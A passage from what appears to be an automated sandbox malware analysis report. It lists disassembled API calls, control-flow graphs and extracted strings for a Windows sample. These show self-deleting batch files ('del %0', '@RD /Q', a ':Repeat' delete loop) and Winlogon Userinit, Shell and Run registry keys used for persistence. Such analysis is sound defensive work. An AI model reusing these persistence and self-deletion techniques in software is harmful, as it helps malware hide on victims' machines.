                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406766
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406771
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040677D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406786
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040678F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040679C
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 004067A9
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,PING 127.0.0.1 -n 2 ), ref: 004067C1
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?,00410860,00410EC8), ref: 004067E7
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(del ,?,00410860,00000000), ref: 004067FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406806
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406813
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000), ref: 00406820
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040682D
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 0040683A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406845
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040684E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406857
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406860
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406869
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406872
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410860,?,00410EC8), ref: 00406881
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(start "" ,?,00410860,004157D0,00000000), ref: 0040689A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068A5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068B2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068BF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068CC
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 004068D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068ED
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068FF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406908
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406911
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406923
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406931
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040693C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 0040694F
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 0040695C
                              • exit.MSVCRT ref: 00406968
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00406974
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$V10@V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$??0?$basic_string@$D@1@@$??4?$basic_string@??6std@@D@std@@@0@V01@V01@@V?$basic_ostream@$File$D@std@@@std@@V10@0@$AttributesCopyD@2@@0@@$??0?$basic_ofstream@?close@?$basic_ofstream@CreateD?$basic_ofstream@DirectoryExecuteShellexitgetenv
                              • String ID: Ox@$PING 127.0.0.1 -n 2 $Temp$\install.bat$del $del %0 $exit $open$start ""
                              • API String ID: 3747557075-3575361830
                              • Opcode ID: debd270ebac2bb5bb204475dcb5e697f56e708a94e9d501d83d58abb2228746f
                              • Instruction ID: 3a0a7e291378ef6016657a3b256388cc9313874f64008c8d2928daba6d98e237
                              • Opcode Fuzzy Hash: debd270ebac2bb5bb204475dcb5e697f56e708a94e9d501d83d58abb2228746f
                              • Instruction Fuzzy Hash: C8D1507190011EEBCB10ABA0EC5DDEE7B7CFB54304B044476F516E2191EEB89A99CB68
                              Function 00406D29 Relevance: 135.1, APIs: 59, Strings: 18, Instructions: 309registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 953 406d29-406d3c 954 406d48-406d4f 953->954 955 406d3e-406d43 call 40524e 953->955 957 406d51 call 40e4ab 954->957 958 406d56-406d67 954->958 955->954 957->958 959 406d80-406d8c 958->959 960 406d69-406d7d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 958->960 963 406da1-406dad 959->963 964 406d8e-406d9e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 959->964 960->959 967 406dd4-406ddb 963->967 968 406daf-406dd1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 408fda 963->968 964->963 971 406e02-406e09 967->971 972 406ddd-406dff ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 408fda 967->972 968->967 973 406e22-406e63 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 408f64 971->973 974 406e0b-406e1f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 971->974 972->971 982 406e65-406e79 GetModuleFileNameA 973->982 983 406e7b-406e85 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ RegDeleteKeyA 973->983 974->973 984 406e8b-406ea6 SetFileAttributesA 982->984 983->984 985 406ea8 984->985 986 406eab-406ec0 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 984->986 985->986 987 406ed1-406f49 getenv ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ 986->987 988 406ec2-406ecf ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ SetFileAttributesA 986->988 989 40710c-40712e ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 987->989 990 406f4f-406fca ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 987->990 988->987 991 40702c-40703c ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 990->991 992 406fcc-407026 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 990->992 993 40707d-407106 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z * 2 ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ShellExecuteA exit 991->993 994 40703e-407077 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 991->994 992->991 993->989 994->993
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406D6B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406D90
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415918,00410668,76F93520), ref: 00406DBF
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415918,00410668,76F93520), ref: 00406DED
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406E0D
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415918,00410668,76F93520), ref: 00406E29
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406E32
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000000), ref: 00406E4C
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406E73
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406EA2
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,76F93520), ref: 00405263
                                • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406E7D
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406E85
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406EB6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406EC8
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00406ECF
                              • getenv.MSVCRT ref: 00406EE4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406EEF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406EFA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F07
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F12
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406F1B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,00000001), ref: 00406F28
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406F35
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406F41
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406F61
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406F79
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406F89
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406F96
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406FA3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FAE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FB7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406FC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406FDF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406FEF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406FFC
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00407009
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407014
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040701D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00407032
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00407049
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407056
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00407063
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040706E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407077
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,?,00410F2C), ref: 0040708B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00407098
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 004070A5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070B9
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070CB
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070D9
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 004070E4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000), ref: 004070F2
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 004070FF
                              • exit.MSVCRT ref: 00407106
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407112
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 0040711B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00407124
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$??1?$basic_string@$V10@$D@2@@0@$Hstd@@$?c_str@?$basic_string@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@V10@@$File$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@D?$basic_ofstream@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                              • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$del "$del %0 $exit $explorer.exe$if exist "$open$update.bat
                              • API String ID: 3539474836-3658685564
                              • Opcode ID: 5a96464736123f44b41d57e83acd263e9b05569708759541ce9a089a0eb9b578
                              • Instruction ID: 85814611d3c695b275b499f4b080fe16a1c3fdb49b7e8a264d8a5f024fe5fead
                              • Opcode Fuzzy Hash: 5a96464736123f44b41d57e83acd263e9b05569708759541ce9a089a0eb9b578
                              • Instruction Fuzzy Hash: C7B16172940109ABDB10EBA0DD4EEDE7B7DAB54304F1040B7F506B2191DBB89E898B6D
                              Function 00406988 Relevance: 117.5, APIs: 49, Strings: 18, Instructions: 275registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1173 406988-40699b 1174 4069a7-4069ae 1173->1174 1175 40699d-4069a2 call 40524e 1173->1175 1177 4069b0 call 40e4ab 1174->1177 1178 4069b5-4069c6 1174->1178 1175->1174 1177->1178 1179 4069c8-4069dc ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 1178->1179 1180 4069df-4069eb 1178->1180 1179->1180 1183 406a00-406a0c 1180->1183 1184 4069ed-4069fd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 1180->1184 1187 406a33-406a3a 1183->1187 1188 406a0e-406a30 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 408fda 1183->1188 1184->1183 1191 406a61-406a68 1187->1191 1192 406a3c-406a5e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 408fda 1187->1192 1188->1187 1193 406a81-406ad9 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 408f64 1191->1193 1194 406a6a-406a7e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 1191->1194 1192->1191 1202 406af1-406afb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ RegDeleteKeyA 1193->1202 1203 406adb-406aef GetModuleFileNameA 1193->1203 1194->1193 1204 406b01-406b56 getenv ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1202->1204 1203->1204 1205 406b58-406b69 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ SetFileAttributesA 1204->1205 1206 406b6b-406b7b SetFileAttributesA 1204->1206 1205->1206 1207 406b80-406ba8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ 1206->1207 1208 406b7d 1206->1208 1209 406d21-406d23 exit 1207->1209 1210 406bae-406c28 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1207->1210 1208->1207 1211 406c8a-406c96 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1210->1211 1212 406c2a-406c84 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1210->1212 1213 406c98-406cd5 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z 